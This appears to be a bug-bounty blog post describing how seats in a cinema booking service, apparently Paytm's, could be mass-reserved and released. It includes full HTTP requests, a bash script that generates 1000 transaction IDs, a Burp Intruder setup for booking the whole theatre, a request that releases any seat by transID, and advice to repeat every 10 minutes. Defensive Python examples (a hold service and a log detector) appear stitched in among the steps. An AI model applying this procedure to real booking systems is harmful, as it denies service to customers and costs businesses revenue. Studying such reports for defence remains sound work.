How a Vulnerability in Cinema Booking Systems Can Block Seats and Impact Revenue


Anonymousshetty

In the digital age, online booking systems have become a cornerstone of convenience for consumers and businesses alike. However, these systems are not immune to vulnerabilities that can be exploited to disrupt services, cause financial losses, and damage a company’s reputation.

Recently, I identified a critical flaw in a cinema booking system that highlights the importance of securing such platforms. Here’s a detailed analysis of the issue, its potential impact, and why it needs immediate attention.

[NOTE: although this was not accepted as a vulnerability, since it was classified as an application-level DoS, I am sharing it so that you can understand my thought process behind this find.]

The Vulnerability: Exploiting tempTransID and transID

The vulnerability revolves around how the booking system handles temporary transaction IDs (tempTransID) and booking IDs (bookingIDs). By leveraging a single tempTransID, an attacker can generate multiple unique bookingIDs in a brute-force manner. These bookingIDs can then be used to reserve all the available seats in a theatre.

The booking system allows reservations to expire after a 10-minute interval. However, this restriction can be bypassed by automating the reservation process to repeat every 10 minutes, effectively blocking legitimate users from accessing the seats. This creates a denial-of-service scenario where no real customers can complete bookings.

Additionally, the system’s reliance on transID for managing reservations introduces another layer of vulnerability. By obtaining or guessing the transID associated with a booking, an attacker can unbook specific seats at will. This provides unauthorized control over seat availability and further exacerbates the issue.
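The three weaknesses described above (a seat cap that is not enforced across all of an account's tempTransIds, holds that can be minted without limit, and a release endpoint that trusts any transId) all live in the server's hold logic. The Python model below is an added example, not the booking platform's code; the class and method names (SeatHoldService, hold_seat, release_seat), the in-memory store and the 10-seat cap value are assumptions, and each check closes one of those gaps.

```python
import secrets
import time
from dataclasses import dataclass

HOLD_TTL_SECONDS = 600        # the 10-minute hold described in the post
MAX_SEATS_PER_ACCOUNT = 10    # assumed cap, enforced per account, not per tempTransId


@dataclass
class Hold:
    account: str
    seat: str
    expires_at: float


class SeatHoldService:
    """In-memory stand-in for the server-side hold store (assumed design)."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.holds: dict[str, Hold] = {}   # transId -> Hold

    def _purge_expired(self):
        now = self.clock()
        for tid in [t for t, h in self.holds.items() if h.expires_at <= now]:
            del self.holds[tid]

    def seats_held_by(self, account):
        self._purge_expired()
        return sum(1 for h in self.holds.values() if h.account == account)

    def hold_seat(self, account, seat):
        """Return (ok, transId or reason). The cap counts every live hold of
        the account, so minting new tempTransIds yields no extra seats."""
        self._purge_expired()
        if any(h.seat == seat for h in self.holds.values()):
            return False, "seat already held"
        if self.seats_held_by(account) >= MAX_SEATS_PER_ACCOUNT:
            return False, "per-account seat limit reached"
        trans_id = secrets.token_hex(32)   # server-generated, unguessable
        self.holds[trans_id] = Hold(account, seat, self.clock() + HOLD_TTL_SECONDS)
        return True, trans_id

    def release_seat(self, account, trans_id):
        """Release succeeds only for the account that created the hold, so a
        leaked or guessed transId cannot unbook another customer's seat."""
        self._purge_expired()
        hold = self.holds.get(trans_id)
        if hold is None or hold.account != account:
            return False   # identical answer for unknown and foreign ids
        del self.holds[trans_id]
        return True
```

Re-holding every 10 minutes still works against this model, but the per-account cap bounds the damage to 10 seats per account instead of the whole theatre.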

[At first the triager said that this was intended behavior and that a user can book many seats, but upon testing I found that a user can book at most 10 seats. I was able to book more than 10 seats, so to demonstrate impact I booked the whole theatre.]

Step 1) While booking a single seat, view the request flow in Burp Suite and send the request below to Repeater:

POST /v2/movies/add-seat?version=3&site_id=6&channel=web&child_site_id=370&client_id=<redacted>&clientId=<redacted> HTTP/2
Host: <redacted>.paytm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<redacted>.com/
Content-Type: application/json; charset=utf-8
Content-Length: 285
Origin: https://<redacted>.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Priority: u=4
Te: trailers

{"cancelOld":false,"cinemaId":1025103,"sessionId":"86814","providerId":1707,"tempTransId":"3feb8964ea8f12955068e2719238c410c34c8865901e554ea6091f9efa685f47","ticketType":"86814_CL","ticketcount":1,"freeSeating":false,"showDateTime":"2025-01-24T07:30:00.000Z","totalTicketPrice":190.59}

The response would be:

{"bookingId":"5359e6bc3717cc75b13d41bc5bf5c7b76bbea04028ca3999c39054598dba2ec3","seatInfo":"CL-1","totalAmount":null,"tempTransId":"5359e6bc3717cc75b13d41bc5bf5c7b76bbea04028ca3999c39054598dba2ec3","bookingIndex":"5359e6bc3717cc75b13d41bc5bf5c7b76bbea04028ca3999c39054598dba2ec3","uniqueBookingId":"5359e6bc3717cc75b13d41bc5bf5c7b76bbea04028ca3999c39054598dba2ec3","seatCodes":["CL-1"],"merchantIds":{"food":226708,"ticket":226708},"bookingHashKey":"a25d92ffc4","items":{},"rules":[]}

The hash returned as uniqueBookingId can be used to book a seat, and an attacker could write a bash script to create anywhere from one to thousands of such hashes.

Step 2) Create a bash script that generates 1000 hashes:

#!/bin/bash

url="https://<redacted>.paytm.com/v2/movies/add-seat?version=3&site_id=6&channel=web&child_site_id=370&client_id=<redacted>&clientId=<redacted>"

data='{
  "cancelOld": false,
  "cinemaId": 1025103,
  "sessionId": "86814",
  "providerId": 1707,
  "tempTransId": "3feb8964ea8f12955068e2719238c410c34c8865901e554ea6091f9efa685f47",
  "ticketType": "86814_CL",
  "ticketcount": 1,
  "freeSeating": false,
  "showDateTime": "2025-01-24T07:30:00.000Z",
  "totalTicketPrice": 190.59
}'

output_file="tempTransIds.txt"

for i in {1..1000}
do
    echo "Sending request $i..."

    # Send the POST request and capture the response body
    response=$(curl -s -X POST "$url" \
        -H "Host: <redacted>.paytm.com" \
        -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" \
        -H "Content-Type: application/json; charset=utf-8" \
        --data-binary "$data")

    echo "Full response for request $i:"
    echo "$response"
    echo "--------------------------------------------------"

    # Extract tempTransId from the response body
    tempTransId=$(echo "$response" | grep -o '"tempTransId":"[^"]*' | sed 's/"tempTransId":"//')

    if [ ! -z "$tempTransId" ]; then
        echo "Extracted tempTransId: $tempTransId"
        echo "$tempTransId" >> "$output_file"
    else
        echo "No tempTransId found in the response for request $i."
    fi
done

echo "Done! 1000 tempTransIds have been saved to '$output_file'."

Step 3) During the booking flow there was another request, which I then sent to Intruder. This was the request:

POST /v1/movies/set-seat?version=3&site_id=6&channel=web&child_site_id=370&client_id=<redacted>&clientId=<redacted> HTTP/2
Host: <redacted>.paytm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<redacted>.com/
Content-Type: application/json; charset=utf-8
Content-Length: 296
Origin: https://<redacted>.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Priority: u=4
Te: trailers

{"areaNumber":[1],"gridSeatRowId":["3"],"gridSeatNumber":["14"],"areaCategoryCode":["CL"],"cinemaId":1025103,"sessionId":"86814","providerId":1707,"tempTransId":"cad737b505f2d4c1995a1ecd522203377633f748bfa95ab1001eab0e13d12c07","showDateTime":"2025-01-24T07:30:00.000Z","totalTicketPrice":190.59}

In Intruder I used a Pitchfork attack, setting “gridSeatNumber” to a number list from 1–15 and “tempTransId” to a simple list loaded from the tempTransIds.txt file created by the bash script. Then run the attack.

[NOTE: here “gridSeatRowId” can be changed row by row so that every seat in the theatre can be booked.]

Step 4) To free any seat in the theatre, the attacker can simply send the request below:

POST /v1/movies/release-seats?version=3&site_id=6&channel=web&child_site_id=370&client_id=<redacted>&clientId=<redacted> HTTP/2
Host: <redacted>.paytm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<redacted>.com/
Content-Type: application/json; charset=utf-8
Content-Length: 135
Origin: https://<redacted>.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Priority: u=4
Te: trailers

{"cinemaId":1025103,"sessionId":"86814","providerId":1707,"transId":"cad737b505f2d4c1995a1ecd522203377633f748bfa95ab1001eab0e13d12c07"}

Here the attacker simply changes “transId” to the hash present in the output of step 3.

To keep the seats permanently blocked, the attacker can repeat the above steps every 10 minutes using automation.
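The procedure in steps 1–4 leaves a distinctive trace on the server side: one client minting far more successful add-seat holds within a single 10-minute hold window than any real booking flow needs. The script below is an added example of that detection, not the platform's tooling; the log line format, the IP addresses, the sample lines and the threshold value are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: "<iso-timestamp> <client-ip> POST <path> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) POST "
    r"(?P<path>/v[12]/movies/(?:add-seat|set-seat|release-seats))\S* (?P<status>\d{3})$"
)
WINDOW = timedelta(minutes=10)      # the hold lifetime the post describes
ADD_SEAT_THRESHOLD = 20             # assumed; one real flow needs at most 10 holds


def parse(line):
    """Return (timestamp, ip, path, status), or None for lines we don't track."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["ip"], m["path"], int(m["status"])


def flag_burst_clients(lines, threshold=ADD_SEAT_THRESHOLD, window=WINDOW):
    """Map each client IP to its peak count of successful add-seat calls in any
    sliding window, keeping only clients above the threshold. Every successful
    add-seat mints a fresh tempTransId, so this measures the hold-minting rate."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2].endswith("/add-seat") and rec[3] == 200:
            per_ip[rec[1]].append(rec[0])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged


# Constructed sample: one client minting 50 holds in under a minute, one normal booking.
SAMPLE_LOG = [
    "2025-01-24T07:00:%02d 198.51.100.7 POST /v2/movies/add-seat?version=3 200" % s
    for s in range(50)
] + [
    "2025-01-24T07:01:00 203.0.113.5 POST /v2/movies/add-seat?version=3 200",
    "2025-01-24T07:01:05 203.0.113.5 POST /v1/movies/set-seat?version=3 200",
]
```

Running flag_burst_clients(SAMPLE_LOG) flags only 198.51.100.7; the same window logic can be pointed at set-seat calls to catch the Intruder phase.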

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

The intended behavior is that a user can book many seats, but upon testing I found that a user can book at most 10 seats. I was able to book more than 10 seats, so to show impact I booked the whole theatre, which is the reason the vulnerability existed.

[Screenshot: before booking the seats in sections D and E]

[Screenshot: after booking sections D and E]

(You can see that 15 seats are booked; this was done to show impact without disrupting other users during their booking process.)

The implications of this vulnerability are significant and far-reaching:

Denial of Service: By monopolizing all available seats, the attacker prevents legitimate users from making bookings, resulting in a poor customer experience and frustration.

Financial Loss: With no tickets being sold to genuine customers, the theatre incurs direct revenue loss, especially during peak times or for popular shows.

Reputational Damage: Frequent unavailability of seats or complaints about the booking system’s reliability tarnishes the company’s image, leading to loss of customer trust.

Operational Disruption: Staff may need to manually intervene to address customer grievances or resolve booking conflicts, increasing workload and inefficiencies.

Conclusion

This case study underscores the importance of securing online booking systems against exploitation. The potential for financial loss, operational disruption, and reputational damage makes it imperative for companies to prioritize system security.

If you’re interested in learning more about security vulnerabilities and how to protect against them, follow my blog for regular updates and insights.
